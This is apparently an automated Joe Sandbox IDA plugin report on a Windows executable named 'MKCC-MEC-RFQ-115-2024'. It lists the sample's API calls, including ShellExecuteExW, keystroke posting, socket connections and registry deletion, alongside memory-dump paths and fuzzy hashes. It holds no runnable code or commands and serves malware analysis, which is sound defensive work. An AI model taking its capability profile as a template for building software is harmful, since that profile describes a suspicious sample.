                                              • ShellExecuteExW.SHELL32(?), ref: 0015F86A
                                                • Part of subcall function 000E9997: __itow.LIBCMT ref: 000E99C2
                                                • Part of subcall function 000E9997: __swprintf.LIBCMT ref: 000E9A0C
                                                • Part of subcall function 000FFEC6: _wcscpy.LIBCMT ref: 000FFEE9
                                              • GetProcessId.KERNEL32(00000000), ref: 0015F8E1
                                              • CloseHandle.KERNEL32(00000000), ref: 0015F910
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                              • String ID: @
                                              • API String ID: 3522835683-2766056989
                                              • Opcode ID: 3b05bab6c7fefcbd495905ac268d12fd73395b6661934cab3f2487279e2f51e4
                                              • Instruction ID: 03bc9a8746db6fdac393078ba53ebd5f9189cb85400f1c0188a6227fc9f6a8b8
                                              • Opcode Fuzzy Hash: 3b05bab6c7fefcbd495905ac268d12fd73395b6661934cab3f2487279e2f51e4
                                              • Instruction Fuzzy Hash: 68618B75A00659DFCB14EF65C880AAEBBF5FF48310F14846DE85AAB352CB30AD45CB90
                                              APIs
                                              • GetParent.USER32(?), ref: 0014149C
                                              • GetKeyboardState.USER32(?), ref: 001414B1
                                              • SetKeyboardState.USER32(?), ref: 00141512
                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 00141540
                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 0014155F
                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 001415A5
                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 001415C8
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessagePost$KeyboardState$Parent
                                              • String ID:
                                              • API String ID: 87235514-0
                                              • Opcode ID: 08a327e8c3ee05dcbcb4990a84ba8af9d76c4da11741896ff507c01c12f66e01
                                              • Instruction ID: 2f22c19cd44c486e05a6baf887866c94186f231f33672e038edad2c0456ed023
                                              • Opcode Fuzzy Hash: 08a327e8c3ee05dcbcb4990a84ba8af9d76c4da11741896ff507c01c12f66e01
                                              • Instruction Fuzzy Hash: 8851E1A0A447D53EFB3647348C45BBABFA96B46304F0C8589E5D64A8E2D3D8ECC4D760
                                              APIs
                                              • GetParent.USER32(00000000), ref: 001412B5
                                              • GetKeyboardState.USER32(?), ref: 001412CA
                                              • SetKeyboardState.USER32(?), ref: 0014132B
                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00141357
                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00141374
                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 001413B8
                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 001413D9
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessagePost$KeyboardState$Parent
                                              • String ID:
                                              • API String ID: 87235514-0
                                              • Opcode ID: 6e4f8ed6132e61c925757ba474001a020ef3965d471d414f687351bb50718e42
                                              • Instruction ID: b60ab485d282145e81c32844bbb61e211df76aad3cc7817a1a40b403438164c9
                                              • Opcode Fuzzy Hash: 6e4f8ed6132e61c925757ba474001a020ef3965d471d414f687351bb50718e42
                                              • Instruction Fuzzy Hash: B05105A15447D53DFB3287248C45BBABFA96F06310F0C8589E1D886CE2D394ECD5D760
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _wcsncpy$LocalTime
                                              • String ID:
                                              • API String ID: 2945705084-0
                                              • Opcode ID: 5e0e192eb21f4b021788eb7caac13549d8b16fff2d69ee12cd7a86558c19aa6a
                                              • Instruction ID: 9c77c40c337d307429e56fff262d4cf2e920b74b15b2c47bbd83ee570903d66a
                                              • Opcode Fuzzy Hash: 5e0e192eb21f4b021788eb7caac13549d8b16fff2d69ee12cd7a86558c19aa6a
                                              • Instruction Fuzzy Hash: B14192B5C20618B6CB10EBB4CC8A9CFB3AD9F14310F608556F558E3162E774E715C7A9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @U=u
                                              • API String ID: 0-2594219639
                                              • Opcode ID: 94d4051dbb99373c6b36578517439084dc79cbb12e1b468129bb9078e8f2b0cf
                                              • Instruction ID: b8f903c4627557ce781d8778d57d97fa3ad6632be468507367f851a3753ed467
                                              • Opcode Fuzzy Hash: 94d4051dbb99373c6b36578517439084dc79cbb12e1b468129bb9078e8f2b0cf
                                              • Instruction Fuzzy Hash: 1041D035900204AFC724DF28DC48FB9BBA8FF09310F994165E966B72E1DB70ADA1DE51
                                              APIs
                                                • Part of subcall function 001448AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,001438D3,?), ref: 001448C7
                                                • Part of subcall function 001448AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,001438D3,?), ref: 001448E0
                                              • lstrcmpiW.KERNEL32(?,?), ref: 001438F3
                                              • _wcscmp.LIBCMT ref: 0014390F
                                              • MoveFileW.KERNEL32(?,?), ref: 00143927
                                              • _wcscat.LIBCMT ref: 0014396F
                                              • SHFileOperationW.SHELL32(?), ref: 001439DB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                              • String ID: \*.*
                                              • API String ID: 1377345388-1173974218
                                              • Opcode ID: 92f5064e1b39a5fff77f80b7d2493d781a25fa804cc9ebdf78a04b3a304d3344
                                              • Instruction ID: 5fcdec6b3054a1000591f6ebd9306be66d06ff28ee3785081090e3e7a7a0e308
                                              • Opcode Fuzzy Hash: 92f5064e1b39a5fff77f80b7d2493d781a25fa804cc9ebdf78a04b3a304d3344
                                              • Instruction Fuzzy Hash: 1C41A0B240C3849EC751EF64C885ADFB7E8AF98344F14192EF499C31A1EB74D689C752
                                              APIs
                                              • _memset.LIBCMT ref: 00167519
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001675C0
                                              • IsMenu.USER32(?), ref: 001675D8
                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00167620
                                              • DrawMenuBar.USER32 ref: 00167633
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Menu$Item$DrawInfoInsert_memset
                                              • String ID: 0
                                              • API String ID: 3866635326-4108050209
                                              • Opcode ID: 79f73c8a9ff236fb8ed1d38f872126eee82767b4d15b99d30dbefb843b815ed8
                                              • Instruction ID: 2b6cc83d3fb7b3813cf8726b9fd35e5b350f9868686cb18d30fed4a79c08e881
                                              • Opcode Fuzzy Hash: 79f73c8a9ff236fb8ed1d38f872126eee82767b4d15b99d30dbefb843b815ed8
                                              • Instruction Fuzzy Hash: A5414975A04609EFDB10DF54EC84E9ABBF8FB05328F148069E91697290D730AD61CF90
                                              APIs
                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 0016125C
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00161286
                                              • FreeLibrary.KERNEL32(00000000), ref: 0016133D
                                                • Part of subcall function 0016122D: RegCloseKey.ADVAPI32(?), ref: 001612A3
                                                • Part of subcall function 0016122D: FreeLibrary.KERNEL32(?), ref: 001612F5
                                                • Part of subcall function 0016122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00161318
                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 001612E0
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: EnumFreeLibrary$CloseDeleteOpen
                                              • String ID:
                                              • API String ID: 395352322-0
                                              • Opcode ID: f199db38814819f143b2bd2191f247e5916e05aeab90200c621eab094e00d322
                                              • Instruction ID: a88950883d4e1ea8b9f34de4a59ae28fc862f9145f75285c3faabe84a6e1a728
                                              • Opcode Fuzzy Hash: f199db38814819f143b2bd2191f247e5916e05aeab90200c621eab094e00d322
                                              • Instruction Fuzzy Hash: B7313E71901119BFDB14DB90EC89EFFB7BCEF08350F140169F502E2651DB749E959AA0
                                              APIs
                                                • Part of subcall function 001580A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 001580CB
                                              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 001564D9
                                              • WSAGetLastError.WSOCK32(00000000), ref: 001564E8
                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00156521
                                              • connect.WSOCK32(00000000,?,00000010), ref: 0015652A
                                              • WSAGetLastError.WSOCK32 ref: 00156534
                                              • closesocket.WSOCK32(00000000), ref: 0015655D
                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00156576
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                              • String ID:
                                              • API String ID: 910771015-0
                                              • Opcode ID: 87e515674fb07160550493d297285bb2923d2b7d0221500eb9b7858437ea3973
                                              • Instruction ID: 2cc066b06bc4fcf3dadb4e2105de7d76482bfe54fa88e86bbb61a6cfb165e38b
                                              • Opcode Fuzzy Hash: 87e515674fb07160550493d297285bb2923d2b7d0221500eb9b7858437ea3973
                                              • Instruction Fuzzy Hash: 9631B171600218EFDB10AF24DC85BBE7BACEF44751F448069FD15AB291DBB0AD49CBA1
                                              APIs
                                                • Part of subcall function 000E7F41: _memmove.LIBCMT ref: 000E7F82
                                                • Part of subcall function 0013B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0013B0E7
                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 001393F6
                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00139409
                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 00139439
                                                • Part of subcall function 000E7D2C: _memmove.LIBCMT ref: 000E7D66
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend$_memmove$ClassName
                                              • String ID: @U=u$ComboBox$ListBox
                                              • API String ID: 365058703-2258501812
                                              • Opcode ID: 4f5dcc182427d7b35b9f3cdf9a392d03e276b1c134d01491cc7b4053cd7da0ef
                                              • Instruction ID: fa9d4321e1b2d4d843b52fb630aba2dd8a64cde2f46522c1d2e02b5390fb1eed
                                              • Opcode Fuzzy Hash: 4f5dcc182427d7b35b9f3cdf9a392d03e276b1c134d01491cc7b4053cd7da0ef
                                              • Instruction Fuzzy Hash: F52121B1904104BFDB18ABB4DC86CFFB778DF05360F15412DF926A72E2DBB40A0A9660
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0013E0FA
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0013E120
                                              • SysAllocString.OLEAUT32(00000000), ref: 0013E123
                                              • SysAllocString.OLEAUT32 ref: 0013E144
                                              • SysFreeString.OLEAUT32 ref: 0013E14D
                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 0013E167
                                              • SysAllocString.OLEAUT32(?), ref: 0013E175
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                              • String ID:
                                              • API String ID: 3761583154-0
                                              • Opcode ID: 71f59b4d23100032c81facc5e1ad315f12a4a668ae31f8ed174be7212cfa5cc9
                                              • Instruction ID: 1635d554ac8d574020bf7f965dfcb605afceb6b54abd928b054d9ceef95d1e2f
                                              • Opcode Fuzzy Hash: 71f59b4d23100032c81facc5e1ad315f12a4a668ae31f8ed174be7212cfa5cc9
                                              • Instruction Fuzzy Hash: 87215335604208AFDB149FA8DC88DBB77ECEB09760F108139F955CB6A4DBB0DC818B64
                                              APIs
                                              • IsWindowVisible.USER32(?), ref: 0013B6C7
                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0013B6E4
                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0013B71C
                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0013B742
                                              • _wcsstr.LIBCMT ref: 0013B74C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                              • String ID: @U=u
                                              • API String ID: 3902887630-2594219639
                                              • Opcode ID: 45557073cdb1629b6187ad0e043c35bb71bb8144abb0270991d4b43ef05e2155
                                              • Instruction ID: 22888ada50fa1ca6de5d1128d94634627c13df208a9ea00c57ae5d608545c8b7
                                              • Opcode Fuzzy Hash: 45557073cdb1629b6187ad0e043c35bb71bb8144abb0270991d4b43ef05e2155
                                              • Instruction Fuzzy Hash: 31210771208204BBEB255B39EC8AE7B7B98DF89720F10402DF905CA1E1FBA1CC4192A0
                                              APIs
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00139802
                                                • Part of subcall function 000E7D2C: _memmove.LIBCMT ref: 000E7D66
                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00139834
                                              • __itow.LIBCMT ref: 0013984C
                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00139874
                                              • __itow.LIBCMT ref: 00139885
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend$__itow$_memmove
                                              • String ID: @U=u
                                              • API String ID: 2983881199-2594219639
                                              • Opcode ID: 25d7898c3505c54a37c72022d32d75cff379848424c7483fd6c4d6fcf0b1ea84
                                              • Instruction ID: 5b53c71dd8bc82392b60cc278f8bdd3730278b6ada2d52bbd63a1414bbcbbd7a
                                              • Opcode Fuzzy Hash: 25d7898c3505c54a37c72022d32d75cff379848424c7483fd6c4d6fcf0b1ea84
                                              • Instruction Fuzzy Hash: 5A21C871700248AFEB109A65DC86EEE7BA8DF89710F040069F904EB291D7F08D4187D1
                                              APIs
                                                • Part of subcall function 000E1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000E1D73
                                                • Part of subcall function 000E1D35: GetStockObject.GDI32(00000011), ref: 000E1D87
                                                • Part of subcall function 000E1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 000E1D91
                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 001678A1
                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 001678AE
                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 001678B9
                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 001678C8
                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 001678D4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend$CreateObjectStockWindow
                                              • String ID: Msctls_Progress32
                                              • API String ID: 1025951953-3636473452
                                              • Opcode ID: 5e6828cfd94dbf2f5f6a03e98bfcdcc94c2565cdbe01cec9008a2a6b12ec8b78
                                              • Instruction ID: 0095a088c8fc514d288a35a9dc87cb6c1975ceb5bae8234217415755a1239514
                                              • Opcode Fuzzy Hash: 5e6828cfd94dbf2f5f6a03e98bfcdcc94c2565cdbe01cec9008a2a6b12ec8b78
                                              • Instruction Fuzzy Hash: A81190B2514219BFEF159F60CC85EE77F6DEF08758F014115FA04A20A0C7729C61DBA0
                                              APIs
                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00104292,?), ref: 001041E3
                                              • GetProcAddress.KERNEL32(00000000), ref: 001041EA
                                              • EncodePointer.KERNEL32(00000000), ref: 001041F6
                                              • DecodePointer.KERNEL32(00000001,00104292,?), ref: 00104213
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                              • String ID: RoInitialize$combase.dll
                                              • API String ID: 3489934621-340411864
                                              • Opcode ID: 5500ad1f123ebad67086c9043e9627f7f80761f3c62a8202d8a4ce93f22c49aa
                                              • Instruction ID: 22ce72ade68dbcb0d546d17c456893c7f62d5bc07a8958a6e359cdb0b3806c62
                                              • Opcode Fuzzy Hash: 5500ad1f123ebad67086c9043e9627f7f80761f3c62a8202d8a4ce93f22c49aa
                                              • Instruction Fuzzy Hash: 5BE01AB0690300AFEB206BB0FC49B143AA5F7A6B02F108428F591D59E0DBF560DBCF00
                                              APIs
                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,001041B8), ref: 001042B8
                                              • GetProcAddress.KERNEL32(00000000), ref: 001042BF
                                              • EncodePointer.KERNEL32(00000000), ref: 001042CA
                                              • DecodePointer.KERNEL32(001041B8), ref: 001042E5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                              • String ID: RoUninitialize$combase.dll
                                              • API String ID: 3489934621-2819208100
                                              • Opcode ID: e3ffc695ad650e8b948e9c37e953956b73143c3fc5222a8638e1dfaec6f23ba1
                                              • Instruction ID: 9fe99dd09a54e50f7708595dde0ba19ef329eceeda6a179034bfd13f5dccd8f6
                                              • Opcode Fuzzy Hash: e3ffc695ad650e8b948e9c37e953956b73143c3fc5222a8638e1dfaec6f23ba1
                                              • Instruction Fuzzy Hash: 13E0B6B8681310AFEB209B60FD0EB243AA4B765B42F204028F151E19A0CBF495C6CA14
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
